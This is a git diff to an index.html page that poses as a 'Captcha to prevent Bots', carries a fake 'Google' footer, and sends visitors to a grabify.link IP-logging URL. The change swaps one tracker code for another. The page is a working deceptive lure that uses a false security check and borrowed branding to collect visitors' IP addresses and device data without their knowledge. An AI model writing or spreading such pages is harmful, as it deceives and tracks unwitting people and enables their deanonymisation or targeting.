--- a/index.html
+++ b/index.html
@@ -8,7 +8,7 @@
 <body>
     <H1>This is a Captcha to prevent Bots from accessing files</H1><br>
     <h2>To access the file, please tap or click the link below.</h2><br>
-    <a href="https://grabify.link/2OYK3R">Tap/Click Here</a>
+    <a href="https://grabify.link/04P129">Tap/Click Here</a>
     <footer>Google©️</footer>
 </body>
 </html>
